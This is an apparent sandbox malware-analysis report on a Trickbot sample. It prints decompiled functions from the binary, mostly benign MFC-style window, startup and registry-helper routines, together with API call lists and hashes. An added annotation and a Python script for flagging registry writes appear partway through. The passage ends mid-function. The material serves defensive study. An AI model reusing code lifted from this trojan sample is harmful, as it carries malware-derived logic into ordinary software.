			}

                          APIs
                          • UnpackDDElParam.USER32(000003E8,?,?,?), ref: 0042DE69
                          • GlobalLock.KERNEL32(?), ref: 0042DE71
                          • lstrcpynA.KERNEL32(?,00000000,00000208), ref: 0042DE84
                          • GlobalUnlock.KERNEL32(?), ref: 0042DE8D
                          • ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 0042DEA5
                          • PostMessageA.USER32(?,000003E4,?,00000000), ref: 0042DEB2
                            • Part of subcall function 0041B7FA: IsWindowEnabled.USER32(?), ref: 0041B804
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: GlobalParam$EnabledLockMessagePostReuseUnlockUnpackWindowlstrcpyn
                          • String ID:
                          • API String ID: 2333435275-0
                          • Opcode ID: 5c8282126ffabcf2a1b1566253d70a4ab444e7e2f3130adfde91821aaf0419e8
                          • Instruction ID: d9d1a570f6aed9c4a1f84f5da4b610d7a73c25a4d883f5e070b8c32cfa3d59cd
                          • Opcode Fuzzy Hash: 5c8282126ffabcf2a1b1566253d70a4ab444e7e2f3130adfde91821aaf0419e8
                          • Instruction Fuzzy Hash: 0D01A132600108BBDB01EBA1DC89EDF7BBCFF58300F004179B90AE61A1CA749E459B64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 89%
                          			E004333DA(void* _a4, char* _a8, char* _a12) {
                          				void* _t19;
                          				signed int _t21;
                          				long _t24;
                          
				// Writes a REG_SZ string under HKEY_CLASSES_ROOT (0x80000000): _a4 = key path,
				// _a8 = string data, _a12 = value name (NULL means the key's default value, set via
				// RegSetValueA without the NUL in the length). Matches the SetRegKey helper MFC uses
				// for shell file-type registration. HKCR writes fail without elevation, and the
				// failure is swallowed (returns 0), so as a standard user this registers nothing.
				// Trailing comments give the statement address from the report.
				if(_a12 != 0) {  // 0x004333e2
					if(RegCreateKeyA(0x80000000, _a4,  &_a4) != 0) {  // 0x0043341c  _a4 is reused to hold the opened HKEY
						L6:  // 0x00433454
						return 0;
					}  // 0x00433454
					_t24 = RegSetValueExA(_a4, _a12, 0, 1, _a8, lstrlenA(_a8) + 1);  // 0x0043343f  REG_SZ, size includes the NUL
					if(RegCloseKey(_a4) != 0 || _t24 != 0) {  // 0x00433449
						goto L6;
					} else {  // 0x0043344f
						_t19 = 1;  // 0x00433451
						return _t19;
					}  // 0x00433451
				}  // 0x00433449
				_t21 = RegSetValueA(0x80000000, _a4, 1, _a8, lstrlenA(_a8));  // 0x004333fb  default value, REG_SZ
				asm("sbb eax, eax");  // 0x00433403
				return  ~_t21 + 1;  // 1 on ERROR_SUCCESS, else 0
			}

                          APIs
                          • lstrlenA.KERNEL32(?), ref: 004333E7
                          • RegSetValueA.ADVAPI32(80000000,?,00000001,?,00000000), ref: 004333FB
                          • RegCreateKeyA.ADVAPI32(80000000,?,?), ref: 00433414
                          • lstrlenA.KERNEL32(?), ref: 00433421
                          • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 00433436
                          • RegCloseKey.ADVAPI32(?), ref: 00433441
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Valuelstrlen$CloseCreate
                          • String ID:
                          • API String ID: 306239685-0
                          • Opcode ID: 8eb80dff837fc4ab0918ebb6310094e65cd3cdbb69cbc88cb76b00f12fc1ae21
                          • Instruction ID: 7b29450c4508ad6f1e0ba80df4d22da6d0018238b9a1ffd76a0ae7c7bea6f4fb
                          • Opcode Fuzzy Hash: 8eb80dff837fc4ab0918ebb6310094e65cd3cdbb69cbc88cb76b00f12fc1ae21
                          • Instruction Fuzzy Hash: 9F012C32544108FFEF121FA1EC05FAA3B79FB18756F10A021FE15D9160D3B58A60DB58
                          Uniqueness

                          Uniqueness Score: -1.00%
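E004333DA above is a small registry-write helper: the first argument 80000000 passed to RegSetValueA and RegCreateKeyA is the predefined handle HKEY_CLASSES_ROOT, the type argument 1 is REG_SZ, and the routine returns 1 on success and 0 on any failure. Because this report prints hundreds of such per-function records, the following added example (written for this page; it is not part of the sandbox report or of the sample) parses the "APIs" annotations in the format visible here and flags routines that create registry keys or write values, resolving the hive constant in the first argument. The sample input is constructed from annotation lines shown on this page; the record layout it assumes (a "C-Code - Quality" line, the function header on the next line, then an "APIs" list of "• Name.Module(args), ref: ADDR" entries) is an assumption about this report's format.

```python
"""Triage helper for the per-function "APIs" annotations in a Joe Sandbox report.

Added example, not part of the report or of the analysed sample. It parses the
API-call lines printed under each decompiled function and flags routines that
create registry keys or write registry values, resolving the predefined hive
constant (e.g. 80000000 = HKEY_CLASSES_ROOT) that appears as the first argument.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Predefined registry hive handles from winreg.h.
HIVES = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
    0x80000004: "HKEY_PERFORMANCE_DATA",
    0x80000005: "HKEY_CURRENT_CONFIG",
}

# Registry APIs that create keys or write values (ANSI and wide variants).
REG_WRITE_APIS = {
    "RegSetValueA", "RegSetValueW", "RegSetValueExA", "RegSetValueExW",
    "RegCreateKeyA", "RegCreateKeyW", "RegCreateKeyExA", "RegCreateKeyExW",
}

# Assumed record layout: "C-Code - Quality" line, then the function header line.
QUALITY_RE = re.compile(r"^\s*C-Code - Quality:")
HEADER_RE = re.compile(r"^\s*(E[0-9A-Fa-f]{8}|_entry_)\(")
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+([0-9A-Fa-f]+):\s*)?"  # optional subcall prefix
    r"([A-Za-z0-9_]+)\.([A-Za-z0-9_]+)"                             # Name.Module
    r"(?:\(([^)]*)\))?"                                             # optional (args)
    r",?\s*ref:\s*([0-9A-Fa-f]+)\s*$"                               # call-site address
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str]  # callee address when the API is reached indirectly


@dataclass
class FunctionRecord:
    name: str
    calls: List[ApiCall] = field(default_factory=list)


@dataclass
class Finding:
    function: str
    api: str
    hive: Optional[str]
    ref: str


def parse_records(text: str) -> List[FunctionRecord]:
    """Split report text into one FunctionRecord per decompiled function."""
    records: List[FunctionRecord] = []
    expect_header = False
    for line in text.splitlines():
        if QUALITY_RE.match(line):
            expect_header = True
            continue
        if expect_header:
            m = HEADER_RE.match(line)
            if m:
                records.append(FunctionRecord(m.group(1)))
            expect_header = False
            continue
        m = API_RE.match(line)
        if m and records:
            sub, name, module, raw_args, ref = m.groups()
            args = [a.strip() for a in raw_args.split(",")] if raw_args else []
            records[-1].calls.append(ApiCall(name, module, args, ref.upper(), sub))
    return records


def hive_name(arg: str) -> Optional[str]:
    """Map a hex argument such as '80000000' to its predefined hive, or None."""
    try:
        return HIVES.get(int(arg, 16))
    except ValueError:  # '?' and other non-hex placeholders
        return None


def registry_write_findings(records: List[FunctionRecord]) -> List[Finding]:
    """Direct (non-subcall) calls to key-creating or value-writing registry APIs."""
    out: List[Finding] = []
    for rec in records:
        for c in rec.calls:
            if c.name in REG_WRITE_APIS and c.subcall_of is None:
                hive = hive_name(c.args[0]) if c.args else None
                out.append(Finding(rec.name, c.name, hive, c.ref))
    return out


# Constructed sample: annotation blocks in the shape this report uses.
SAMPLE = """\
C-Code - Quality: 89%
\t\t\tE004333DA(void* _a4, char* _a8, char* _a12) {
\t\t\t}
APIs
• lstrlenA.KERNEL32(?), ref: 004333E7
• RegSetValueA.ADVAPI32(80000000,?,00000001,?,00000000), ref: 004333FB
• RegCreateKeyA.ADVAPI32(80000000,?,?), ref: 00433414
• lstrlenA.KERNEL32(?), ref: 00433421
• RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 00433436
• RegCloseKey.ADVAPI32(?), ref: 00433441
C-Code - Quality: 100%
\t\t\tE00422719(struct HWND__* _a4) {
\t\t\t}
APIs
• GetFocus.USER32 ref: 0042271C
  • Part of subcall function 004225BE: GetWindowLongA.USER32(00000000,000000F0), ref: 004225CF
• GetParent.USER32(00000000), ref: 00422743
"""

if __name__ == "__main__":
    for f in registry_write_findings(parse_records(SAMPLE)):
        print(f"{f.function} @ {f.ref}: {f.api} hive={f.hive}")
```

Run it directly to print the flagged calls. On the constructed sample it reports RegSetValueA and RegCreateKeyA against HKEY_CLASSES_ROOT at 004333FB and 00433414, and RegSetValueExA with an unresolved handle, which in the decompiled code is the key just created by RegCreateKeyA. Calls reached only through a subcall are parsed but not flagged, so each finding points at the function that actually issues the write.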

                          C-Code - Quality: 100%
                          			E00422719(struct HWND__* _a4) {
                          				struct HWND__* _t3;
                          				struct HWND__* _t7;
                          				struct HWND__* _t9;
                          				struct HWND__* _t11;
                          
                          				_t3 = GetFocus();
                          				_t11 = _t3;
                          				if(_t11 != 0) {
                          					_t9 = _a4;
                          					if(_t11 != _t9) {
                          						if(E004225BE(_t11, 3) != 0) {
                          							L5:
                          							if(_t9 == 0 || (GetWindowLongA(_t9, 0xfffffff0) & 0x40000000) == 0) {
                          								L8:
                          								return SendMessageA(_t11, 0x14f, 0, 0);
                          							}
                          							_t7 = GetParent(_t9);
                          							_t3 = GetDesktopWindow();
                          							if(_t7 != _t3) {
                          								goto L8;
                          							}
                          						} else {
                          							_t3 = GetParent(_t11);
                          							_t11 = _t3;
                          							if(_t11 != _t9) {
                          								_t3 = E004225BE(_t11, 2);
                          								if(_t3 != 0) {
                          									goto L5;
                          								}
                          							}
                          						}
                          					}
                          				}
                          				return _t3;
                          			}

                          Statement addresses: 0x0042271c, 0x00422722, 0x00422726, 0x00422728, 0x0042272e, 0x00422740, 0x00422757, 0x00422759, 0x0042277a, 0x00000000, 0x00422784, 0x0042276c, 0x00422770, 0x00422778, 0x00000000, 0x00000000, 0x00422742, 0x00422743, 0x00422745, 0x00422749, 0x0042274e, 0x00422755, 0x00000000, 0x00000000, 0x00422755, 0x00422749, 0x00422740, 0x0042272e, 0x0042278d

                          APIs
                          • GetFocus.USER32 ref: 0042271C
                            • Part of subcall function 004225BE: GetWindowLongA.USER32(00000000,000000F0), ref: 004225CF
                          • GetParent.USER32(00000000), ref: 00422743
                            • Part of subcall function 004225BE: GetClassNameA.USER32(00000000,?,0000000A), ref: 004225EA
                            • Part of subcall function 004225BE: lstrcmpiA.KERNEL32(?,combobox), ref: 004225F9
                          • GetWindowLongA.USER32(?,000000F0), ref: 0042275E
                          • GetParent.USER32(?), ref: 0042276C
                          • GetDesktopWindow.USER32 ref: 00422770
                          • SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 00422784
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Window$LongParent$ClassDesktopFocusMessageNameSendlstrcmpi
                          • String ID:
                          • API String ID: 2818563221-0
                          • Opcode ID: 9a6ba839982207bab7df84b2310a581590c58d6d87b91a8c9e456422b7b249f4
                          • Instruction ID: e0bc8e677ae7c427d02043935cf1a87f6b1d1616723f9544aadc7194c24e27ed
                          • Opcode Fuzzy Hash: 9a6ba839982207bab7df84b2310a581590c58d6d87b91a8c9e456422b7b249f4
                          • Instruction Fuzzy Hash: 7DF0F93230453277D73216357DC8B6F91186BD0B52F984226F912B23C0DBEC8C4245AE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 42%
                          			E00422633(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
                          				struct tagRECT _v20;
                          				struct HWND__* _t22;
                          
                          				ClientToScreen(_a4,  &_a8);
                          				_push(5);
                          				_push(_a4);
                          				while(1) {
                          					_t22 = GetWindow();
                          					if(_t22 == 0) {
                          						break;
                          					}
                          					if(GetDlgCtrlID(_t22) == 0xffff || (GetWindowLongA(_t22, 0xfffffff0) & 0x10000000) == 0) {
                          						L5:
                          						_push(2);
                          						_push(_t22);
                          						continue;
                          					} else {
                          						GetWindowRect(_t22,  &_v20);
                          						_push(_a12);
                          						if(PtInRect( &_v20, _a8) != 0) {
                          							return _t22;
                          						}
                          						goto L5;
                          					}
                          				}
                          				return 0;
                          			}

                          Statement addresses: 0x00422642, 0x0042264e, 0x00422650, 0x00422653, 0x00422655, 0x00422659, 0x00000000, 0x00000000, 0x00422666, 0x00422697, 0x00422697, 0x00422699, 0x00000000, 0x00422678, 0x0042267d, 0x00422683, 0x00422695, 0x00000000, 0x0042269c, 0x00000000, 0x00422695, 0x00422666, 0x00000000

                          APIs
                          • ClientToScreen.USER32(?,?), ref: 00422642
                          • GetWindow.USER32(?,00000005), ref: 00422653
                          • GetDlgCtrlID.USER32(00000000), ref: 0042265C
                          • GetWindowLongA.USER32(00000000,000000F0), ref: 0042266B
                          • GetWindowRect.USER32(00000000,?), ref: 0042267D
                          • PtInRect.USER32(?,?,?), ref: 0042268D
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Window$Rect$ClientCtrlLongScreen
                          • String ID:
                          • API String ID: 1315500227-0
                          • Opcode ID: 2fdecb9b09a67683d7ba5fa2e786bd8a593d361eca2dc0b4cf272eaef3c3ce83
                          • Instruction ID: 91cbc5dec15b27557dea0b412f4debd05dd9bf17f3655276b7ccfaea848a063a
                          • Opcode Fuzzy Hash: 2fdecb9b09a67683d7ba5fa2e786bd8a593d361eca2dc0b4cf272eaef3c3ce83
                          • Instruction Fuzzy Hash: 2C018B33201129BBDB12AF64EC08EEF3B2CEF44710F844032F911D11A0EBB499628B9C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00418F5A(intOrPtr* __ecx) {
                          				struct HWND__* _v36;
                          				struct HWND__* _v40;
                          				signed char _v44;
                          				void* _v48;
                          				long _t33;
                          				long _t41;
                          				struct HWND__* _t46;
                          				signed char _t58;
                          				intOrPtr* _t61;
                          				signed int _t62;
                          				void* _t67;
                          				intOrPtr _t69;
                          				intOrPtr* _t70;
                          
                          				_t70 = __ecx;
                          				_t67 = E0041C00C();
                          				if(_t67 != 0) {
                          					if( *((intOrPtr*)(_t67 + 0x1c)) == __ecx) {
                          						 *((intOrPtr*)(_t67 + 0x1c)) = 0;
                          					}
                          					if( *((intOrPtr*)(_t67 + 0x20)) == _t70) {
                          						 *((intOrPtr*)(_t67 + 0x20)) = 0;
                          					}
                          				}
                          				_t61 =  *((intOrPtr*)(_t70 + 0x30));
                          				if(_t61 != 0) {
                          					 *((intOrPtr*)( *_t61 + 0x50))();
                          					 *((intOrPtr*)(_t70 + 0x30)) = 0;
                          				}
                          				_t62 =  *(_t70 + 0x34);
                          				_t58 = 1;
                          				if(_t62 != 0) {
                          					 *((intOrPtr*)( *_t62 + 4))(_t58);
                          				}
                          				 *(_t70 + 0x34) =  *(_t70 + 0x34) & 0x00000000;
                          				if(( *(_t70 + 0x24) & _t58) != 0) {
                          					_t69 =  *((intOrPtr*)(E00432335() + 0xcc));
                          					if(_t69 != 0 &&  *(_t69 + 0x1c) != 0) {
                          						E00405360( &_v48, 0, 0x2c);
                          						_t46 =  *(_t70 + 0x1c);
                          						_v40 = _t46;
                          						_v36 = _t46;
                          						_v48 = 0x28;
                          						_v44 = _t58;
                          						SendMessageA( *(_t69 + 0x1c), 0x405, 0,  &_v48);
                          					}
                          				}
                          				_t33 = GetWindowLongA( *(_t70 + 0x1c), 0xfffffffc);
                          				E004187B4(_t70);
                          				if(GetWindowLongA( *(_t70 + 0x1c), 0xfffffffc) == _t33) {
                          					_t41 =  *( *((intOrPtr*)( *_t70 + 0x80))());
                          					if(_t41 != 0) {
                          						SetWindowLongA( *(_t70 + 0x1c), 0xfffffffc, _t41);
                          					}
                          				}
                          				E004188CB(_t70);
                          				return  *((intOrPtr*)( *_t70 + 0xa4))();
                          			}

                          Statement addresses: 0x00418f63, 0x00418f6a, 0x00418f70, 0x00418f75, 0x00418f9a, 0x00418f9a, 0x00418fa0, 0x00418fa2, 0x00418fa2, 0x00418fa0, 0x00418fa5, 0x00418faa, 0x00418fae, 0x00418fb1, 0x00418fb1, 0x00418fb4, 0x00418fbb, 0x00418fbc, 0x00418fc1, 0x00418fc1, 0x00418fc4, 0x00418fcb, 0x00418fd2, 0x00418fda, 0x00418fea, 0x00418fef, 0x00418ff5, 0x00418ff8, 0x00418ffe, 0x0041900d, 0x00419013, 0x00419013, 0x00418fda, 0x00419024, 0x0041902a, 0x00419038, 0x00419044, 0x00419048, 0x00419050, 0x00419050, 0x00419048, 0x00419058, 0x0041906b

                          APIs
                          • SendMessageA.USER32(00000000,00000405,00000000,?), ref: 00419013
                          • GetWindowLongA.USER32(?,000000FC), ref: 00419024
                          • GetWindowLongA.USER32(?,000000FC), ref: 00419034
                          • SetWindowLongA.USER32(?,000000FC,?), ref: 00419050
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: LongWindow$MessageSend
                          • String ID: (
                          • API String ID: 2178440468-3887548279
                          • Opcode ID: e785fbd2e9faaac9409ec5df27795d31915064b3830c8dcd5dde4bfbfd937210
                          • Instruction ID: 47ea66deb5c0114beaf2568d15371b34a74f7849c5cd63fa222098a74304a788
                          • Opcode Fuzzy Hash: e785fbd2e9faaac9409ec5df27795d31915064b3830c8dcd5dde4bfbfd937210
                          • Instruction Fuzzy Hash: 7E319E316007009FDB21AF65D884A9EBBB5BF48314F14463EF54297691CB78EC85CB58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 85%
                          			E00433BB8(void* __ecx, void* __eflags) {
                          				CHAR* _v8;
                          				char _v268;
                          				char _v528;
                          				char _v784;
                          				void* __ebp;
                          				signed char* _t35;
                          				intOrPtr _t39;
                          				intOrPtr _t43;
                          				CHAR* _t54;
                          				void* _t62;
                          				intOrPtr* _t63;
                          				void* _t64;
                          
                          				_t55 = __ecx;
                          				_t64 = __ecx;
                          				_t62 = E00432562();
                          				 *(_t62 + 8) =  *(_t64 + 0x68);
                          				 *(_t62 + 0xc) =  *(_t64 + 0x68);
                          				GetModuleFileNameA( *(_t64 + 0x68),  &_v528, 0x104);
                          				_t35 = E00405F05(_t55,  &_v528, 0x2e);
                          				 *_t35 =  *_t35 & 0x00000000;
                          				_v8 = _t35;
                          				E00433CD5( &_v528,  &_v268, 0x104);
                          				if( *((intOrPtr*)(_t64 + 0x88)) == 0) {
                          					 *((intOrPtr*)(_t64 + 0x88)) = E004061F2( &_v268);
                          				}
                          				if( *((intOrPtr*)(_t64 + 0x78)) == 0) {
                          					if(E0041C702(0xe000,  &_v784, 0x100) == 0) {
                          						_push( *((intOrPtr*)(_t64 + 0x88)));
                          					} else {
                          						_push( &_v784);
                          					}
                          					 *((intOrPtr*)(_t64 + 0x78)) = E004061F2();
                          				}
                          				_t39 =  *((intOrPtr*)(_t64 + 0x78));
                          				 *((intOrPtr*)(_t62 + 0x10)) = _t39;
                          				_t63 = _t64 + 0x8c;
                          				if( *((intOrPtr*)(_t64 + 0x8c)) == 0) {
                          					_t54 = _v8;
                          					lstrcpyA(_t54, ".HLP");
                          					_t39 = E004061F2( &_v528);
                          					 *_t63 = _t39;
                          					 *_t54 =  *_t54 & 0x00000000;
                          				}
                          				if( *((intOrPtr*)(_t64 + 0x90)) == 0) {
                          					lstrcatA( &_v268, ".INI");
                          					_t43 = E004061F2( &_v268);
                          					 *((intOrPtr*)(_t64 + 0x90)) = _t43;
                          					return _t43;
                          				}
                          				return _t39;
                          			}

                          Statement addresses: 0x00433bb8, 0x00433bc4, 0x00433bcb, 0x00433bd5, 0x00433bdb, 0x00433be9, 0x00433bf8, 0x00433bfd, 0x00433c02, 0x00433c14, 0x00433c21, 0x00433c30, 0x00433c30, 0x00433c39, 0x00433c53, 0x00433c5e, 0x00433c55, 0x00433c5b, 0x00433c5b, 0x00433c6a, 0x00433c6a, 0x00433c6d, 0x00433c70, 0x00433c79, 0x00433c7f, 0x00433c81, 0x00433c8a, 0x00433c97, 0x00433c9c, 0x00433c9e, 0x00433ca1, 0x00433ca9, 0x00433cb7, 0x00433cc4, 0x00433cca, 0x00000000, 0x00433cca, 0x00433cd4

                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 00433BE9
                            • Part of subcall function 00433CD5: lstrlenA.KERNEL32(00000104,00000000,?,00433C19), ref: 00433D0C
                          • lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 00433C8A
                          • lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 00433CB7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: FileModuleNamelstrcatlstrcpylstrlen
                          • String ID: .HLP$.INI
                          • API String ID: 2421895198-3011182340
                          • Opcode ID: 3e2b42bdda4b2481fb62ea1bbb17bf545dc563a39e817a650de5c8e1f7e0231a
                          • Instruction ID: 866fbf80d877ecd22aa45f376ffa17dbb366cc33ffb77a63ae15dcaf366ae993
                          • Opcode Fuzzy Hash: 3e2b42bdda4b2481fb62ea1bbb17bf545dc563a39e817a650de5c8e1f7e0231a
                          • Instruction Fuzzy Hash: 703182B24047189FDB20DFB5C885BC6B7E8AB08314F10597BE196E2191DB78AA808F14
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 83%
                          			_entry_(void* __ebx, void* __edi, void* __esi) {
                          				CHAR* _v8;
                          				intOrPtr* _v24;
                          				intOrPtr _v28;
                          				struct _STARTUPINFOA _v96;
                          				intOrPtr _v100;
                          				intOrPtr _v104;
                          				intOrPtr _v108;
                          				unsigned int _t15;
                          				signed int _t27;
                          				signed int _t35;
                          				intOrPtr _t52;
                          
                          				_t47 = __edi;
                          				_push(0xffffffff);
                          				_push(0x43e4c0);
                          				_push(E004070AC);
                          				_push( *[fs:0x0]);
                          				 *[fs:0x0] = _t52;
                          				_push(__edi);
                          				_v28 = _t52 - 0x58;
                          				_t15 = GetVersion();
                          				 *0x44b760 = 0;
                          				_t35 = _t15 & 0x000000ff;
                          				 *0x44b75c = _t35;
                          				 *0x44b758 = _t35 << 8;
                          				 *0x44b754 = _t15 >> 0x10;
                          				if(E0040815F(1) == 0) {
                          					E004052D4(0x1c);
                          				}
                          				if(E00407AAC() == 0) {
                          					E004052D4(0x10);
                          				}
                          				_v8 = 0;
                          				E004092E2();
                          				 *0x44d2f8 = GetCommandLineA();
                          				 *0x44b744 = E004091B0();
                          				E00408F63();
                          				E00408EAA();
                          				E0040621D();
                          				_v96.dwFlags = 0;
                          				GetStartupInfoA( &_v96);
                          				_v104 = E00408E52();
                          				_t56 = _v96.dwFlags & 0x00000001;
                          				if((_v96.dwFlags & 0x00000001) == 0) {
                          					_t27 = 0xa;
                          				} else {
                          					_t27 = _v96.wShowWindow & 0x0000ffff;
                          				}
                          				_v100 = E00413D27(GetModuleHandleA(0), 0, _v104, _t27);
                          				E0040624A(_t29);
                          				_t31 = _v24;
                          				_t40 =  *((intOrPtr*)( *_v24));
                          				_v108 =  *((intOrPtr*)( *_v24));
                          				return E00408CDA(_t47, _t56, _t40, _t31);
                          			}

                          Statement addresses: 0x004051a7, 0x004051aa, 0x004051ac, 0x004051b1, 0x004051bc, 0x004051bd, 0x004051c9, 0x004051ca, 0x004051cd, 0x004051d7, 0x004051df, 0x004051e5, 0x004051f0, 0x004051f9, 0x00405208, 0x0040520c, 0x00405211, 0x00405219, 0x0040521d, 0x00405222, 0x00405225, 0x00405228, 0x00405233, 0x0040523d, 0x00405242, 0x00405247, 0x0040524c, 0x00405251, 0x00405258, 0x00405263, 0x00405266, 0x0040526a, 0x00405274, 0x0040526c, 0x0040526c, 0x0040526c, 0x00405287, 0x0040528b, 0x00405290, 0x00405295, 0x00405297, 0x004052a3

                          APIs
                          • GetVersion.KERNEL32 ref: 004051CD
                            • Part of subcall function 0040815F: HeapCreate.KERNELBASE(00000000,00001000,00000000,00405205,00000001), ref: 00408170
                            • Part of subcall function 0040815F: HeapDestroy.KERNEL32 ref: 0040818E
                          • GetCommandLineA.KERNEL32 ref: 0040522D
                          • GetStartupInfoA.KERNEL32(?), ref: 00405258
                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040527B
                            • Part of subcall function 004052D4: ExitProcess.KERNEL32 ref: 004052F1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                          • String ID: ^<
                          • API String ID: 2057626494-3676403682
                          • Opcode ID: 73b449356f71fd1c36e44c95f46d965c128b046a3380e9522ed4288eceeb63a0
                          • Instruction ID: e6019f4a9cb0f5a20fc7bacbca297649c9a311edd79f13838cb342d8e4dfe181
                          • Opcode Fuzzy Hash: 73b449356f71fd1c36e44c95f46d965c128b046a3380e9522ed4288eceeb63a0
                          • Instruction Fuzzy Hash: 552185B1940705AADB04BFB6DD45A6E77A8EF45704F10457FF505AA2D1DB7C8800CF68
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0042E226(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
                          				void* __ebp;
                          				void* _t29;
                          				int _t30;
                          				void* _t35;
                          				void* _t38;
                          				intOrPtr* _t40;
                          				int _t42;
                          				intOrPtr* _t45;
                          				void* _t46;
                          
                          				_t45 = __ecx;
                          				_t29 = E00419EDA(__ecx);
                          				_t40 =  *((intOrPtr*)(_t45 + 0x68));
                          				_t42 = _a4;
                          				_t38 = _t29;
                          				if(_t40 == 0) {
                          					L2:
                          					if(_a8 != 0xffff) {
                          						if(_t42 == 0 || (_a8 & 0x00000810) != 0) {
                          							 *(_t45 + 0x90) =  *(_t45 + 0x90) & 0x00000000;
                          							goto L17;
                          						} else {
                          							if(_t42 < 0xf000 || _t42 >= 0xf1f0) {
                          								if(_t42 < 0xff00) {
                          									goto L13;
                          								}
                          								 *(_t45 + 0x90) = 0xef1f;
                          								goto L17;
                          							} else {
                          								_t42 = (_t42 + 0xffff1000 >> 4) + 0xef00;
                          								L13:
                          								 *(_t45 + 0x90) = _t42;
                          								L17:
